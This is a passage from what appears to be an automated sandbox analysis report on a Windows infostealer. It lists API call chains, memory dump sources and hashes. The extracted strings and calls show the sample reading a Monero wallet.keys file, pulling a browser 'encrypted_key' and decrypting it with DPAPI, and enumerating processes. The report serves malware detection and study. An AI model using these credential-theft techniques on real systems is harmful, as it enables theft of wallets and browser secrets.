                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036D901
                                    • lstrlen.KERNEL32(00000000), ref: 0036DA9F
                                    • lstrlen.KERNEL32(00000000), ref: 0036DAB3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0036DB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 0896d73d541e00101378fe1573691de584921f96b996ecadea058ddc91655631
                                    • Instruction ID: e632e62c43ef87b3e4d12cdaa542d42e80b9fbe4894c49237edaa409cacb6f6d
                                    • Opcode Fuzzy Hash: 0896d73d541e00101378fe1573691de584921f96b996ecadea058ddc91655631
                                    • Instruction Fuzzy Hash: 3381E7729105049BCB26FBA4DCA6DEE7379AF94300F50C559F51B6A091EF386A08CB72
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction ID: 272508cc6bcbfa07823518304f8e9945bcfb3ca65df5a4cbecab9224c066053a
                                    • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction Fuzzy Hash: 4251E573500256AFEB2B8F55E881BBA77A8FF01304F25462EE8065B791E771ED80D790
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0036A664
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: @$v10$v20
                                    • API String ID: 2746078483-278772428
                                    • Opcode ID: cb000a55e9a836c9ec8ba2e53326ffa611f6c68e7bf6fb560647198a2553810c
                                    • Instruction ID: a2fd61308b98adaab104cacd0bf8f2816a5a276c457f840232216d81e1ba7bd9
                                    • Opcode Fuzzy Hash: cb000a55e9a836c9ec8ba2e53326ffa611f6c68e7bf6fb560647198a2553810c
                                    • Instruction Fuzzy Hash: C6514C70A10208AFDB29EFA4CD96FED77B5AF81304F00C118E90A6F295EB746A05CB51
                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 0036A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                      • Part of subcall function 0036A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                      • Part of subcall function 0036A110: LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                      • Part of subcall function 0036A110: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                      • Part of subcall function 0036A110: LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                      • Part of subcall function 0036A110: CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                      • Part of subcall function 00378FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378FE2
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00381678,00380D93), ref: 0036F64C
                                    • lstrlen.KERNEL32(00000000), ref: 0036F66B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: a83a8efef8091f3c5b9d7ba08b861f5d42a2a343c883b2080eb65c9f7f1e839d
                                    • Instruction ID: 0ce7f01921c263e007a1f0d45da7dee7144c1cc4c0fad3d2387f24b7a400f40d
                                    • Opcode Fuzzy Hash: a83a8efef8091f3c5b9d7ba08b861f5d42a2a343c883b2080eb65c9f7f1e839d
                                    • Instruction Fuzzy Hash: B7512372D105089BCB26FBB4DD62DED7379AF94300F50C568F41B6B195EE386A08CB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: f55b6c2a53dc2d44ada43b94eb590fe3ed2e9ad9dc224f9614b079deb3b86a9b
                                    • Instruction ID: da297a7c8b37cf5aa62a2dea52a24a607984a238fcb7c10bf6d5246e619b3305
                                    • Opcode Fuzzy Hash: f55b6c2a53dc2d44ada43b94eb590fe3ed2e9ad9dc224f9614b079deb3b86a9b
                                    • Instruction Fuzzy Hash: 8B414F71D142099BCB25EFA4D855AEEB779AF44304F00C018F51A7B290EB789B09DFA2
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0036A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                      • Part of subcall function 0036A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                      • Part of subcall function 0036A110: LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                      • Part of subcall function 0036A110: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                      • Part of subcall function 0036A110: LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                      • Part of subcall function 0036A110: CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                      • Part of subcall function 00378FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378FE2
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0036A489
                                      • Part of subcall function 0036A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A23F
                                      • Part of subcall function 0036A210: LocalAlloc.KERNEL32(00000040,?,?,?,00364F3E,00000000,?), ref: 0036A251
                                      • Part of subcall function 0036A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A27A
                                      • Part of subcall function 0036A210: LocalFree.KERNEL32(?,?,?,?,00364F3E,00000000,?), ref: 0036A28F
                                      • Part of subcall function 0036A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0036A2D4
                                      • Part of subcall function 0036A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0036A2F3
                                      • Part of subcall function 0036A2B0: LocalFree.KERNEL32(?), ref: 0036A323
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 8afee2f264cf974d92e6fc3d97859519b48a21a8eadd4347d0dd393d186c8235
                                    • Instruction ID: fd449598c08a8b9cb5252796b3ae8acb852d31870bef257c9b41da0fdc896f35
                                    • Opcode Fuzzy Hash: 8afee2f264cf974d92e6fc3d97859519b48a21a8eadd4347d0dd393d186c8235
                                    • Instruction Fuzzy Hash: 503170B6D00608ABCF15DBE4DC45AEEB7B8AB58300F048558E906B7245F7309E04CFA2
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003805BF), ref: 0037885A
                                    • Process32First.KERNEL32(?,00000128), ref: 0037886E
                                    • Process32Next.KERNEL32(?,00000128), ref: 00378883
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • CloseHandle.KERNEL32(?), ref: 003788F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: b4711356b33c1c4081110539456c203caececb885851a9f5af74399d1f0b7ada
                                    • Instruction ID: cedb22627b50763b831c226682c93f6c44eb36cf82ed4811de809dbcd8a54821
                                    • Opcode Fuzzy Hash: b4711356b33c1c4081110539456c203caececb885851a9f5af74399d1f0b7ada
                                    • Instruction Fuzzy Hash: 0F313C71901618ABCB76EB94CC55FEEB7B9EF45700F108199F10EA61A0DB346A44CFA1
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003DFE13
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003DFE2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction ID: b6fa2aaf71f8ddcce42cfbcf9ef5c654b8c07b49d361b685c0a6a78e288c54fa
                                    • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction Fuzzy Hash: 090171331097B1AEF63626757CC9AAB2798EB017B5735433AF127892F2EFA14C419180
                                    APIs
                                    • __getptd.LIBCMT ref: 0037CA7E
                                      • Part of subcall function 0037C2A0: __amsg_exit.LIBCMT ref: 0037C2B0
                                    • __getptd.LIBCMT ref: 0037CA95
                                    • __amsg_exit.LIBCMT ref: 0037CAA3
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0037CAC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Catch
                                    • String ID: MOC$RCC
                                    • API String ID: 78271584-2084237596
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: T8>
                                    • API String ID: 0-1108016686
                                    APIs
                                      • Part of subcall function 00378F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 003751CA
                                    • lstrcat.KERNEL32(?,00381058), ref: 003751E7
                                    • lstrcat.KERNEL32(?,00F38950), ref: 003751FB
                                    • lstrcat.KERNEL32(?,0038105C), ref: 0037520D
                                      • Part of subcall function 00374B60: wsprintfA.USER32 ref: 00374B7C
                                      • Part of subcall function 00374B60: FindFirstFileA.KERNEL32(?,?), ref: 00374B93
                                      • Part of subcall function 00374B60: StrCmpCA.SHLWAPI(?,00380FC4), ref: 00374BC1
                                      • Part of subcall function 00374B60: StrCmpCA.SHLWAPI(?,00380FC8), ref: 00374BD7
                                      • Part of subcall function 00374B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00374DCD
                                      • Part of subcall function 00374B60: FindClose.KERNEL32(000000FF), ref: 00374DE2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0